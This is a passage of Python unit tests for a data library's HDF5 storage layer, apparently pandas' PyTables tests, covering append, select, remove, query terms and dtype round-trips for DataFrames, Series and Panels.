assert_panel_equal(store.select('p2'), p_empty)
def test_append_raise(self):
with ensure_clean_store(self.path) as store:
# test append with invalid input to get good error messages
# list in column
df = tm.makeDataFrame()
df['invalid'] = [['a']] * len(df)
assert df.dtypes['invalid'] == np.object_
pytest.raises(TypeError, store.append, 'df', df)
# multiple invalid columns
df['invalid2'] = [['a']] * len(df)
df['invalid3'] = [['a']] * len(df)
pytest.raises(TypeError, store.append, 'df', df)
# datetime with embedded nans as object
df = tm.makeDataFrame()
s = Series(datetime.datetime(2001, 1, 2), index=df.index)
s = s.astype(object)
s[0:5] = np.nan
df['invalid'] = s
assert df.dtypes['invalid'] == np.object_
pytest.raises(TypeError, store.append, 'df', df)
# directly ndarray
pytest.raises(TypeError, store.append, 'df', np.arange(10))
# series directly
pytest.raises(TypeError, store.append,
'df', Series(np.arange(10)))
# appending an incompatible table
df = tm.makeDataFrame()
store.append('df', df)
df['foo'] = 'foo'
pytest.raises(ValueError, store.append, 'df', df)
def test_table_index_incompatible_dtypes(self):
df1 = DataFrame({'a': [1, 2, 3]})
df2 = DataFrame({'a': [4, 5, 6]},
index=date_range('1/1/2000', periods=3))
with ensure_clean_store(self.path) as store:
store.put('frame', df1, format='table')
pytest.raises(TypeError, store.put, 'frame', df2,
format='table', append=True)
def test_table_values_dtypes_roundtrip(self):
with ensure_clean_store(self.path) as store:
df1 = DataFrame({'a': [1, 2, 3]}, dtype='f8')
store.append('df_f8', df1)
assert_series_equal(df1.dtypes, store['df_f8'].dtypes)
df2 = DataFrame({'a': [1, 2, 3]}, dtype='i8')
store.append('df_i8', df2)
assert_series_equal(df2.dtypes, store['df_i8'].dtypes)
# incompatible dtype
pytest.raises(ValueError, store.append, 'df_i8', df1)
# check creation/storage/retrieval of float32 (a bit hacky to
# actually create them thought)
df1 = DataFrame(
np.array([[1], [2], [3]], dtype='f4'), columns=['A'])
store.append('df_f4', df1)
assert_series_equal(df1.dtypes, store['df_f4'].dtypes)
assert df1.dtypes[0] == 'float32'
# check with mixed dtypes
df1 = DataFrame(dict((c, Series(np.random.randn(5), dtype=c))
for c in ['float32', 'float64', 'int32',
'int64', 'int16', 'int8']))
df1['string'] = 'foo'
df1['float322'] = 1.
df1['float322'] = df1['float322'].astype('float32')
df1['bool'] = df1['float32'] > 0
df1['time1'] = Timestamp('20130101')
df1['time2'] = Timestamp('20130102')
store.append('df_mixed_dtypes1', df1)
result = store.select('df_mixed_dtypes1').get_dtype_counts()
expected = Series({'float32': 2, 'float64': 1, 'int32': 1,
'bool': 1, 'int16': 1, 'int8': 1,
'int64': 1, 'object': 1, 'datetime64[ns]': 2})
result = result.sort_index()
result = expected.sort_index()
tm.assert_series_equal(result, expected)
def test_table_mixed_dtypes(self):
# frame
df = tm.makeDataFrame()
df['obj1'] = 'foo'
df['obj2'] = 'bar'
df['bool1'] = df['A'] > 0
df['bool2'] = df['B'] > 0
df['bool3'] = True
df['int1'] = 1
df['int2'] = 2
df['timestamp1'] = Timestamp('20010102')
df['timestamp2'] = Timestamp('20010103')
df['datetime1'] = datetime.datetime(2001, 1, 2, 0, 0)
df['datetime2'] = datetime.datetime(2001, 1, 3, 0, 0)
df.loc[3:6, ['obj1']] = np.nan
df = df._consolidate()._convert(datetime=True)
with ensure_clean_store(self.path) as store:
store.append('df1_mixed', df)
tm.assert_frame_equal(store.select('df1_mixed'), df)
with catch_warnings(record=True):
# panel
wp = tm.makePanel()
wp['obj1'] = 'foo'
wp['obj2'] = 'bar'
wp['bool1'] = wp['ItemA'] > 0
wp['bool2'] = wp['ItemB'] > 0
wp['int1'] = 1
wp['int2'] = 2
wp = wp._consolidate()
with catch_warnings(record=True):
with ensure_clean_store(self.path) as store:
store.append('p1_mixed', wp)
assert_panel_equal(store.select('p1_mixed'), wp)
with catch_warnings(record=True):
# ndim
wp = tm.makePanel4D()
wp['obj1'] = 'foo'
wp['obj2'] = 'bar'
wp['bool1'] = wp['l1'] > 0
wp['bool2'] = wp['l2'] > 0
wp['int1'] = 1
wp['int2'] = 2
wp = wp._consolidate()
with ensure_clean_store(self.path) as store:
store.append('p4d_mixed', wp)
assert_panel4d_equal(store.select('p4d_mixed'), wp)
def test_unimplemented_dtypes_table_columns(self):
with ensure_clean_store(self.path) as store:
l = [('date', datetime.date(2001, 1, 2))]
# py3 ok for unicode
if not compat.PY3:
l.append(('unicode', u('\\u03c3')))
# currently not supported dtypes ####
for n, f in l:
df = tm.makeDataFrame()
df[n] = f
pytest.raises(
TypeError, store.append, 'df1_%s' % n, df)
# frame
df = tm.makeDataFrame()
df['obj1'] = 'foo'
df['obj2'] = 'bar'
df['datetime1'] = datetime.date(2001, 1, 2)
df = df._consolidate()._convert(datetime=True)
with ensure_clean_store(self.path) as store:
# this fails because we have a date in the object block......
pytest.raises(TypeError, store.append, 'df_unimplemented', df)
def test_calendar_roundtrip_issue(self):
# 8591
# doc example from tseries holiday section
weekmask_egypt = 'Sun Mon Tue Wed Thu'
holidays = ['2012-05-01',
datetime.datetime(2013, 5, 1), np.datetime64('2014-05-01')]
bday_egypt = pd.offsets.CustomBusinessDay(
holidays=holidays, weekmask=weekmask_egypt)
dt = datetime.datetime(2013, 4, 30)
dts = date_range(dt, periods=5, freq=bday_egypt)
s = (Series(dts.weekday, dts).map(
Series('Mon Tue Wed Thu Fri Sat Sun'.split())))
with ensure_clean_store(self.path) as store:
store.put('fixed', s)
result = store.select('fixed')
assert_series_equal(result, s)
store.append('table', s)
result = store.select('table')
assert_series_equal(result, s)
def test_roundtrip_tz_aware_index(self):
# GH 17618
time = pd.Timestamp('2000-01-01 01:00:00', tz='US/Eastern')
df = pd.DataFrame(data=[0], index=[time])
with ensure_clean_store(self.path) as store:
store.put('frame', df, format='fixed')
recons = store['frame']
tm.assert_frame_equal(recons, df)
assert recons.index[0].value == 946706400000000000
def test_append_with_timedelta(self):
# GH 3577
# append timedelta
df = DataFrame(dict(A=Timestamp('20130101'), B=[Timestamp(
'20130101') + timedelta(days=i, seconds=10) for i in range(10)]))
df['C'] = df['A'] - df['B']
df.loc[3:5, 'C'] = np.nan
with ensure_clean_store(self.path) as store:
# table
_maybe_remove(store, 'df')
store.append('df', df, data_columns=True)
result = store.select('df')
assert_frame_equal(result, df)
result = store.select('df', where="C<100000")
assert_frame_equal(result, df)
result = store.select('df', where="C<pd.Timedelta('-3D')")
assert_frame_equal(result, df.iloc[3:])
result = store.select('df', "C<'-3D'")
assert_frame_equal(result, df.iloc[3:])
# a bit hacky here as we don't really deal with the NaT properly
result = store.select('df', "C<'-500000s'")
result = result.dropna(subset=['C'])
assert_frame_equal(result, df.iloc[6:])
result = store.select('df', "C<'-3.5D'")
result = result.iloc[1:]
assert_frame_equal(result, df.iloc[4:])
# fixed
_maybe_remove(store, 'df2')
store.put('df2', df)
result = store.select('df2')
assert_frame_equal(result, df)
def test_remove(self):
with ensure_clean_store(self.path) as store:
ts = tm.makeTimeSeries()
df = tm.makeDataFrame()
store['a'] = ts
store['b'] = df
_maybe_remove(store, 'a')
assert len(store) == 1
tm.assert_frame_equal(df, store['b'])
_maybe_remove(store, 'b')
assert len(store) == 0
# nonexistence
pytest.raises(KeyError, store.remove, 'a_nonexistent_store')
# pathing
store['a'] = ts
store['b/foo'] = df
_maybe_remove(store, 'foo')
_maybe_remove(store, 'b/foo')
assert len(store) == 1
store['a'] = ts
store['b/foo'] = df
_maybe_remove(store, 'b')
assert len(store) == 1
# __delitem__
store['a'] = ts
store['b'] = df
del store['a']
del store['b']
assert len(store) == 0
def test_remove_where(self):
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
# non-existance
crit1 = 'index>foo'
pytest.raises(KeyError, store.remove, 'a', [crit1])
# try to remove non-table (with crit)
# non-table ok (where = None)
wp = tm.makePanel(30)
store.put('wp', wp, format='table')
store.remove('wp', ["minor_axis=['A', 'D']"])
rs = store.select('wp')
expected = wp.reindex(minor_axis=['B', 'C'])
assert_panel_equal(rs, expected)
# empty where
_maybe_remove(store, 'wp')
store.put('wp', wp, format='table')
# deleted number (entire table)
n = store.remove('wp', [])
assert n == 120
# non - empty where
_maybe_remove(store, 'wp')
store.put('wp', wp, format='table')
pytest.raises(ValueError, store.remove,
'wp', ['foo'])
def test_remove_startstop(self):
# GH #4835 and #6177
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
wp = tm.makePanel(30)
# start
_maybe_remove(store, 'wp1')
store.put('wp1', wp, format='t')
n = store.remove('wp1', start=32)
assert n == 120 - 32
result = store.select('wp1')
expected = wp.reindex(major_axis=wp.major_axis[:32 // 4])
assert_panel_equal(result, expected)
_maybe_remove(store, 'wp2')
store.put('wp2', wp, format='t')
n = store.remove('wp2', start=-32)
assert n == 32
result = store.select('wp2')
expected = wp.reindex(major_axis=wp.major_axis[:-32 // 4])
assert_panel_equal(result, expected)
# stop
_maybe_remove(store, 'wp3')
store.put('wp3', wp, format='t')
n = store.remove('wp3', stop=32)
assert n == 32
result = store.select('wp3')
expected = wp.reindex(major_axis=wp.major_axis[32 // 4:])
assert_panel_equal(result, expected)
_maybe_remove(store, 'wp4')
store.put('wp4', wp, format='t')
n = store.remove('wp4', stop=-32)
assert n == 120 - 32
result = store.select('wp4')
expected = wp.reindex(major_axis=wp.major_axis[-32 // 4:])
assert_panel_equal(result, expected)
# start n stop
_maybe_remove(store, 'wp5')
store.put('wp5', wp, format='t')
n = store.remove('wp5', start=16, stop=-16)
assert n == 120 - 32
result = store.select('wp5')
expected = wp.reindex(
major_axis=(wp.major_axis[:16 // 4]
.union(wp.major_axis[-16 // 4:])))
assert_panel_equal(result, expected)
_maybe_remove(store, 'wp6')
store.put('wp6', wp, format='t')
n = store.remove('wp6', start=16, stop=16)
assert n == 0
result = store.select('wp6')
expected = wp.reindex(major_axis=wp.major_axis)
assert_panel_equal(result, expected)
# with where
_maybe_remove(store, 'wp7')
# TODO: unused?
date = wp.major_axis.take(np.arange(0, 30, 3)) # noqa
crit = 'major_axis=date'
store.put('wp7', wp, format='t')
n = store.remove('wp7', where=[crit], stop=80)
assert n == 28
result = store.select('wp7')
expected = wp.reindex(major_axis=wp.major_axis.difference(
wp.major_axis[np.arange(0, 20, 3)]))
assert_panel_equal(result, expected)
def test_remove_crit(self):
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
wp = tm.makePanel(30)
# group row removal
_maybe_remove(store, 'wp3')
date4 = wp.major_axis.take([0, 1, 2, 4, 5, 6, 8, 9, 10])
crit4 = 'major_axis=date4'
store.put('wp3', wp, format='t')
n = store.remove('wp3', where=[crit4])
assert n == 36
result = store.select('wp3')
expected = wp.reindex(
major_axis=wp.major_axis.difference(date4))
assert_panel_equal(result, expected)
# upper half
_maybe_remove(store, 'wp')
store.put('wp', wp, format='table')
date = wp.major_axis[len(wp.major_axis) // 2]
crit1 = 'major_axis>date'
crit2 = "minor_axis=['A', 'D']"
n = store.remove('wp', where=[crit1])
assert n == 56
n = store.remove('wp', where=[crit2])
assert n == 32
result = store['wp']
expected = wp.truncate(after=date).reindex(minor=['B', 'C'])
assert_panel_equal(result, expected)
# individual row elements
_maybe_remove(store, 'wp2')
store.put('wp2', wp, format='table')
date1 = wp.major_axis[1:3]
crit1 = 'major_axis=date1'
store.remove('wp2', where=[crit1])
result = store.select('wp2')
expected = wp.reindex(
major_axis=wp.major_axis.difference(date1))
assert_panel_equal(result, expected)
date2 = wp.major_axis[5]
crit2 = 'major_axis=date2'
store.remove('wp2', where=[crit2])
result = store['wp2']
expected = wp.reindex(
major_axis=(wp.major_axis
.difference(date1)
.difference(Index([date2]))
))
assert_panel_equal(result, expected)
date3 = [wp.major_axis[7], wp.major_axis[9]]
crit3 = 'major_axis=date3'
store.remove('wp2', where=[crit3])
result = store['wp2']
expected = wp.reindex(major_axis=wp.major_axis
.difference(date1)
.difference(Index([date2]))
.difference(Index(date3)))
assert_panel_equal(result, expected)
# corners
_maybe_remove(store, 'wp4')
store.put('wp4', wp, format='table')
n = store.remove(
'wp4', where="major_axis>wp.major_axis[-1]")
result = store.select('wp4')
assert_panel_equal(result, wp)
def test_invalid_terms(self):
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
df = tm.makeTimeDataFrame()
df['string'] = 'foo'
df.loc[0:4, 'string'] = 'bar'
wp = tm.makePanel()
p4d = tm.makePanel4D()
store.put('df', df, format='table')
store.put('wp', wp, format='table')
store.put('p4d', p4d, format='table')
# some invalid terms
pytest.raises(ValueError, store.select,
'wp', "minor=['A', 'B']")
pytest.raises(ValueError, store.select,
'wp', ["index=['20121114']"])
pytest.raises(ValueError, store.select, 'wp', [
"index=['20121114', '20121114']"])
pytest.raises(TypeError, Term)
# more invalid
pytest.raises(
ValueError, store.select, 'df', 'df.index[3]')
pytest.raises(SyntaxError, store.select, 'df', 'index>')
pytest.raises(
ValueError, store.select, 'wp',
"major_axis<'20000108' & minor_axis['A', 'B']")
# from the docs
with ensure_clean_path(self.path) as path:
dfq = DataFrame(np.random.randn(10, 4), columns=list(
'ABCD'), index=date_range('20130101', periods=10))
dfq.to_hdf(path, 'dfq', format='table', data_columns=True)
# check ok
read_hdf(path, 'dfq',
where="index>Timestamp('20130104') & columns=['A', 'B']")
read_hdf(path, 'dfq', where="A>0 or C>0")
# catch the invalid reference
with ensure_clean_path(self.path) as path:
dfq = DataFrame(np.random.randn(10, 4), columns=list(
'ABCD'), index=date_range('20130101', periods=10))
dfq.to_hdf(path, 'dfq', format='table')
pytest.raises(ValueError, read_hdf, path,
'dfq', where="A>0 or C>0")
def test_terms(self):
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
wp = tm.makePanel()
wpneg = Panel.fromDict({-1: tm.makeDataFrame(),
0: tm.makeDataFrame(),
1: tm.makeDataFrame()})
p4d = tm.makePanel4D()
store.put('p4d', p4d, format='table')
store.put('wp', wp, format='table')
store.put('wpneg', wpneg, format='table')
# panel
result = store.select(
'wp',
"major_axis<'20000108' and minor_axis=['A', 'B']")
expected = wp.truncate(
after='20000108').reindex(minor=['A', 'B'])
assert_panel_equal(result, expected)
# with deprecation
result = store.select(
'wp', where=("major_axis<'20000108' "
"and minor_axis=['A', 'B']"))
expected = wp.truncate(
after='20000108').reindex(minor=['A', 'B'])
tm.assert_panel_equal(result, expected)
# p4d
with catch_warnings(record=True):
result = store.select('p4d',
("major_axis<'20000108' and "
"minor_axis=['A', 'B'] and "
"items=['ItemA', 'ItemB']"))
expected = p4d.truncate(after='20000108').reindex(
minor=['A', 'B'], items=['ItemA', 'ItemB'])
assert_panel4d_equal(result, expected)
with catch_warnings(record=True):
# valid terms
terms = [('major_axis=20121114'),
('major_axis>20121114'),
(("major_axis=['20121114', '20121114']"),),
('major_axis=datetime.datetime(2012, 11, 14)'),
'major_axis> 20121114',
'major_axis >20121114',
'major_axis > 20121114',
(("minor_axis=['A', 'B']"),),
(("minor_axis=['A', 'B']"),),
((("minor_axis==['A', 'B']"),),),
(("items=['ItemA', 'ItemB']"),),
('items=ItemA'),
]
for t in terms:
store.select('wp', t)
store.select('p4d', t)
# valid for p4d only
terms = ["labels=['l1', 'l2']"]
for t in terms:
store.select('p4d', t)
with tm.assert_raises_regex(
TypeError, 'Only named functions are supported'):
store.select(
'wp',
'major_axis == (lambda x: x)("20130101")')
with catch_warnings(record=True):
# check USub node parsing
res = store.select('wpneg', 'items == -1')
expected = Panel({-1: wpneg[-1]})
tm.assert_panel_equal(res, expected)
with tm.assert_raises_regex(NotImplementedError,
'Unary addition '
'not supported'):
store.select('wpneg', 'items == +1')
def test_term_compat(self):
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
wp = Panel(np.random.randn(2, 5, 4), items=['Item1', 'Item2'],
major_axis=date_range('1/1/2000', periods=5),
minor_axis=['A', 'B', 'C', 'D'])
store.append('wp', wp)
result = store.select(
'wp', where=("major_axis>20000102 "
"and minor_axis=['A', 'B']"))
expected = wp.loc[:, wp.major_axis >
Timestamp('20000102'), ['A', 'B']]
assert_panel_equal(result, expected)
store.remove('wp', 'major_axis>20000103')
result = store.select('wp')
expected = wp.loc[:, wp.major_axis <= Timestamp('20000103'), :]
assert_panel_equal(result, expected)
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
wp = Panel(np.random.randn(2, 5, 4),
items=['Item1', 'Item2'],
major_axis=date_range('1/1/2000', periods=5),
minor_axis=['A', 'B', 'C', 'D'])
store.append('wp', wp)
# stringified datetimes
result = store.select(
'wp', 'major_axis>datetime.datetime(2000, 1, 2)')
expected = wp.loc[:, wp.major_axis > Timestamp('20000102')]
assert_panel_equal(result, expected)
result = store.select(
'wp', 'major_axis>datetime.datetime(2000, 1, 2)')
expected = wp.loc[:, wp.major_axis > Timestamp('20000102')]
assert_panel_equal(result, expected)
result = store.select(
'wp',
"major_axis=[datetime.datetime(2000, 1, 2, 0, 0), "
"datetime.datetime(2000, 1, 3, 0, 0)]")
expected = wp.loc[:, [Timestamp('20000102'),
Timestamp('20000103')]]
assert_panel_equal(result, expected)
result = store.select(
'wp', "minor_axis=['A', 'B']")
expected = wp.loc[:, :, ['A', 'B']]
assert_panel_equal(result, expected)
def test_same_name_scoping(self):
with ensure_clean_store(self.path) as store:
import pandas as pd
df = DataFrame(np.random.randn(20, 2),
index=pd.date_range('20130101', periods=20))
store.put('df', df, format='table')
expected = df[df.index > pd.Timestamp('20130105')]
import datetime # noqa
result = store.select('df', 'index>datetime.datetime(2013,1,5)')
assert_frame_equal(result, expected)
from datetime import datetime # noqa
# technically an error, but allow it
result = store.select('df', 'index>datetime.datetime(2013,1,5)')
assert_frame_equal(result, expected)
result = store.select('df', 'index>datetime(2013,1,5)')
assert_frame_equal(result, expected)
def test_series(self):
s = tm.makeStringSeries()
self._check_roundtrip(s, tm.assert_series_equal)
ts = tm.makeTimeSeries()
self._check_roundtrip(ts, tm.assert_series_equal)
ts2 = Series(ts.index, Index(ts.index, dtype=object))
self._check_roundtrip(ts2, tm.assert_series_equal)
ts3 = Series(ts.values, Index(np.asarray(ts.index, dtype=object),
dtype=object))
self._check_roundtrip(ts3, tm.assert_series_equal,
check_index_type=False)
def test_sparse_series(self):
s = tm.makeStringSeries()
s.iloc[3:5] = np.nan
ss = s.to_sparse()
self._check_roundtrip(ss, tm.assert_series_equal,
check_series_type=True)
ss2 = s.to_sparse(kind='integer')
self._check_roundtrip(ss2, tm.assert_series_equal,
check_series_type=True)
ss3 = s.to_sparse(fill_value=0)
self._check_roundtrip(ss3, tm.assert_series_equal,
check_series_type=True)
def test_sparse_frame(self):
s = tm.makeDataFrame()
s.iloc[3:5, 1:3] = np.nan
s.iloc[8:10, -2] = np.nan
ss = s.to_sparse()
self._check_double_roundtrip(ss, tm.assert_frame_equal,
check_frame_type=True)
ss2 = s.to_sparse(kind='integer')
self._check_double_roundtrip(ss2, tm.assert_frame_equal,
check_frame_type=True)
ss3 = s.to_sparse(fill_value=0)
self._check_double_roundtrip(ss3, tm.assert_frame_equal,
check_frame_type=True)
def test_float_index(self):
# GH #454
index = np.random.randn(10)
s = Series(np.random.randn(10), index=index)
self._check_roundtrip(s, tm.assert_series_equal)
def test_tuple_index(self):
# GH #492
col = np.arange(10)
idx = [(0., 1.), (2., 3.), (4., 5.)]
data = np.random.randn(30).reshape((3, 10))
DF = DataFrame(data, index=idx, columns=col)
with catch_warnings(record=True):
self._check_roundtrip(DF, tm.assert_frame_equal)
def test_index_types(self):
with catch_warnings(record=True):
values = np.random.randn(2)
func = lambda l, r: tm.assert_series_equal(l, r,
check_dtype=True,
check_index_type=True,
check_series_type=True)
with catch_warnings(record=True):
ser = Series(values, [0, 'y'])
self._check_roundtrip(ser, func)
with catch_warnings(record=True):
ser = Series(values, [datetime.datetime.today(), 0])
self._check_roundtrip(ser, func)
with catch_warnings(record=True):
ser = Series(values, ['y', 0])
self._check_roundtrip(ser, func)
with catch_warnings(record=True):
ser = Series(values, [datetime.date.today(), 'a'])
self._check_roundtrip(ser, func)
with catch_warnings(record=True):
ser = Series(values, [0, 'y'])
self._check_roundtrip(ser, func)
ser = Series(values, [datetime.datetime.today(), 0])
self._check_roundtrip(ser, func)
ser = Series(values, ['y', 0])
self._check_roundtrip(ser, func)
ser = Series(values, [datetime.date.today(), 'a'])
self._check_roundtrip(ser, func)
ser = Series(values, [1.23, 'b'])
self._check_roundtrip(ser, func)
ser = Series(values, [1, 1.53])
self._check_roundtrip(ser, func)
ser = Series(values, [1, 5])
self._check_roundtrip(ser, func)
ser = Series(values, [datetime.datetime(
2012, 1, 1), datetime.datetime(2012, 1, 2)])
self._check_roundtrip(ser, func)
def test_timeseries_preepoch(self):
dr = bdate_range('1/1/1940', '1/1/1960')
ts = Series(np.random.randn(len(dr)), index=dr)
try:
self._check_roundtrip(ts, tm.assert_series_equal)
except OverflowError:
pytest.skip('known failer on some windows platforms')
@pytest.mark.parametrize("compression", [
False, pytest.param(True, marks=td.skip_if_windows_python_3)
])
def test_frame(self, compression):
df = tm.makeDataFrame()
# put in some random NAs
df.values[0, 0] = np.nan
df.values[5, 3] = np.nan
self._check_roundtrip_table(df, tm.assert_frame_equal,
compression=compression)
self._check_roundtrip(df, tm.assert_frame_equal,
compression=compression)
tdf = tm.makeTimeDataFrame()
self._check_roundtrip(tdf, tm.assert_frame_equal,
compression=compression)
with ensure_clean_store(self.path) as store:
# not consolidated
df['foo'] = np.random.randn(len(df))
store['df'] = df
recons = store['df']
assert recons._data.is_consolidated()
# empty
self._check_roundtrip(df[:0], tm.assert_frame_equal)
def test_empty_series_frame(self):
s0 = Series()
s1 = Series(name='myseries')
df0 = DataFrame()
df1 = DataFrame(index=['a', 'b', 'c'])
df2 = DataFrame(columns=['d', 'e', 'f'])
self._check_roundtrip(s0, tm.assert_series_equal)
self._check_roundtrip(s1, tm.assert_series_equal)
self._check_roundtrip(df0, tm.assert_frame_equal)
self._check_roundtrip(df1, tm.assert_frame_equal)
self._check_roundtrip(df2, tm.assert_frame_equal)
def test_empty_series(self):
for dtype in [np.int64, np.float64, np.object, 'm8[ns]', 'M8[ns]']:
s = Series(dtype=dtype)
self._check_roundtrip(s, tm.assert_series_equal)
def test_can_serialize_dates(self):
rng = [x.date() for x in bdate_range('1/1/2000', '1/30/2000')]
frame = DataFrame(np.random.randn(len(rng), 4), index=rng)
self._check_roundtrip(frame, tm.assert_frame_equal)
def test_store_hierarchical(self):
index = MultiIndex(levels=[['foo', 'bar', 'baz', 'qux'],
['one', 'two', 'three']],
labels=[[0, 0, 0, 1, 1, 2, 2, 3, 3, 3],
[0, 1, 2, 0, 1, 1, 2, 0, 1, 2]],
names=['foo', 'bar'])
frame = DataFrame(np.random.randn(10, 3), index=index,
columns=['A', 'B', 'C'])
self._check_roundtrip(frame, tm.assert_frame_equal)
self._check_roundtrip(frame.T, tm.assert_frame_equal)
self._check_roundtrip(frame['A'], tm.assert_series_equal)
# check that the names are stored
with ensure_clean_store(self.path) as store:
store['frame'] = frame
recons = store['frame']
tm.assert_frame_equal(recons, frame)
def test_store_index_name(self):
df = tm.makeDataFrame()
df.index.name = 'foo'
with ensure_clean_store(self.path) as store:
store['frame'] = df
recons = store['frame']
tm.assert_frame_equal(recons, df)
def test_store_index_name_with_tz(self):
# GH 13884
df = pd.DataFrame({'A': [1, 2]})
df.index = pd.DatetimeIndex([1234567890123456787, 1234567890123456788])
df.index = df.index.tz_localize('UTC')
df.index.name = 'foo'
with ensure_clean_store(self.path) as store:
store.put('frame', df, format='table')
recons = store['frame']
tm.assert_frame_equal(recons, df)
@pytest.mark.parametrize('table_format', ['table', 'fixed'])
def test_store_index_name_numpy_str(self, table_format):
# GH #13492
idx = pd.Index(pd.to_datetime([datetime.date(2000, 1, 1),
datetime.date(2000, 1, 2)]),
name=u('cols\u05d2'))
idx1 = pd.Index(pd.to_datetime([datetime.date(2010, 1, 1),
datetime.date(2010, 1, 2)]),
name=u('rows\u05d0'))
df = pd.DataFrame(np.arange(4).reshape(2, 2), columns=idx, index=idx1)
# This used to fail, returning numpy strings instead of python strings.
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df', format=table_format)
df2 = read_hdf(path, 'df')
assert_frame_equal(df, df2, check_names=True)
assert type(df2.index.name) == text_type
assert type(df2.columns.name) == text_type
def test_store_series_name(self):
df = tm.makeDataFrame()
series = df['A']
with ensure_clean_store(self.path) as store:
store['series'] = series
recons = store['series']
tm.assert_series_equal(recons, series)
@pytest.mark.parametrize("compression", [
False, pytest.param(True, marks=td.skip_if_windows_python_3)
])
def test_store_mixed(self, compression):
def _make_one():
df = tm.makeDataFrame()
df['obj1'] = 'foo'
df['obj2'] = 'bar'
df['bool1'] = df['A'] > 0
df['bool2'] = df['B'] > 0
df['int1'] = 1
df['int2'] = 2
return df._consolidate()
df1 = _make_one()
df2 = _make_one()
self._check_roundtrip(df1, tm.assert_frame_equal)
self._check_roundtrip(df2, tm.assert_frame_equal)
with ensure_clean_store(self.path) as store:
store['obj'] = df1
tm.assert_frame_equal(store['obj'], df1)
store['obj'] = df2
tm.assert_frame_equal(store['obj'], df2)
# check that can store Series of all of these types
self._check_roundtrip(df1['obj1'], tm.assert_series_equal,
compression=compression)
self._check_roundtrip(df1['bool1'], tm.assert_series_equal,
compression=compression)
self._check_roundtrip(df1['int1'], tm.assert_series_equal,
compression=compression)
def test_wide(self):
with catch_warnings(record=True):
wp = tm.makePanel()
self._check_roundtrip(wp, assert_panel_equal)
def test_select_with_dups(self):
# single dtypes
df = DataFrame(np.random.randn(10, 4), columns=['A', 'A', 'B', 'B'])
df.index = date_range('20130101 9:30', periods=10, freq='T')
with ensure_clean_store(self.path) as store:
store.append('df', df)
result = store.select('df')
expected = df
assert_frame_equal(result, expected, by_blocks=True)
result = store.select('df', columns=df.columns)
expected = df
assert_frame_equal(result, expected, by_blocks=True)
result = store.select('df', columns=['A'])
expected = df.loc[:, ['A']]
assert_frame_equal(result, expected)
# dups across dtypes
df = concat([DataFrame(np.random.randn(10, 4),
columns=['A', 'A', 'B', 'B']),
DataFrame(np.random.randint(0, 10, size=20)
.reshape(10, 2),
columns=['A', 'C'])],
axis=1)
df.index = date_range('20130101 9:30', periods=10, freq='T')
with ensure_clean_store(self.path) as store:
store.append('df', df)
result = store.select('df')
expected = df
assert_frame_equal(result, expected, by_blocks=True)
result = store.select('df', columns=df.columns)
expected = df
assert_frame_equal(result, expected, by_blocks=True)
expected = df.loc[:, ['A']]
result = store.select('df', columns=['A'])
assert_frame_equal(result, expected, by_blocks=True)
expected = df.loc[:, ['B', 'A']]
result = store.select('df', columns=['B', 'A'])
assert_frame_equal(result, expected, by_blocks=True)
# duplicates on both index and columns
with ensure_clean_store(self.path) as store:
store.append('df', df)
store.append('df', df)
expected = df.loc[:, ['B', 'A']]
expected = concat([expected, expected])
result = store.select('df', columns=['B', 'A'])
assert_frame_equal(result, expected, by_blocks=True)
def test_wide_table_dups(self):
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
wp = tm.makePanel()
store.put('panel', wp, format='table')
store.put('panel', wp, format='table', append=True)
recons = store['panel']
assert_panel_equal(recons, wp)
def test_long(self):
def _check(left, right):
assert_panel_equal(left.to_panel(), right.to_panel())
with catch_warnings(record=True):
wp = tm.makePanel()
self._check_roundtrip(wp.to_frame(), _check)
def test_longpanel(self):
pass
def test_overwrite_node(self):
with ensure_clean_store(self.path) as store:
store['a'] = tm.makeTimeDataFrame()
ts = tm.makeTimeSeries()
store['a'] = ts
tm.assert_series_equal(store['a'], ts)
def test_sparse_with_compression(self):
# GH 2931
# make sparse dataframe
arr = np.random.binomial(n=1, p=.01, size=(1000, 10))
df = DataFrame(arr).to_sparse(fill_value=0)
# case 1: store uncompressed
self._check_double_roundtrip(df, tm.assert_frame_equal,
compression=False,
check_frame_type=True)
# case 2: store compressed (works)
self._check_double_roundtrip(df, tm.assert_frame_equal,
compression='zlib',
check_frame_type=True)
# set one series to be completely sparse
df[0] = np.zeros(1000)
# case 3: store df with completely sparse series uncompressed
self._check_double_roundtrip(df, tm.assert_frame_equal,
compression=False,
check_frame_type=True)
# case 4: try storing df with completely sparse series compressed
# (fails)
self._check_double_roundtrip(df, tm.assert_frame_equal,
compression='zlib',
check_frame_type=True)
def test_select(self):
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
wp = tm.makePanel()
# put/select ok
_maybe_remove(store, 'wp')
store.put('wp', wp, format='table')
store.select('wp')
# non-table ok (where = None)
_maybe_remove(store, 'wp')
store.put('wp2', wp)
store.select('wp2')
# selection on the non-indexable with a large number of columns
wp = Panel(np.random.randn(100, 100, 100),
items=['Item%03d' % i for i in range(100)],
major_axis=date_range('1/1/2000', periods=100),
minor_axis=['E%03d' % i for i in range(100)])
_maybe_remove(store, 'wp')
store.append('wp', wp)
items = ['Item%03d' % i for i in range(80)]
result = store.select('wp', 'items=items')
expected = wp.reindex(items=items)
assert_panel_equal(expected, result)
# selectin non-table with a where
# pytest.raises(ValueError, store.select,
# 'wp2', ('column', ['A', 'D']))
# select with columns=
df = tm.makeTimeDataFrame()
_maybe_remove(store, 'df')
store.append('df', df)
result = store.select('df', columns=['A', 'B'])
expected = df.reindex(columns=['A', 'B'])
tm.assert_frame_equal(expected, result)
# equivalentsly
result = store.select('df', [("columns=['A', 'B']")])
expected = df.reindex(columns=['A', 'B'])
tm.assert_frame_equal(expected, result)
# with a data column
_maybe_remove(store, 'df')
store.append('df', df, data_columns=['A'])
result = store.select('df', ['A > 0'], columns=['A', 'B'])
expected = df[df.A > 0].reindex(columns=['A', 'B'])
tm.assert_frame_equal(expected, result)
# all a data columns
_maybe_remove(store, 'df')
store.append('df', df, data_columns=True)
result = store.select('df', ['A > 0'], columns=['A', 'B'])
expected = df[df.A > 0].reindex(columns=['A', 'B'])
tm.assert_frame_equal(expected, result)
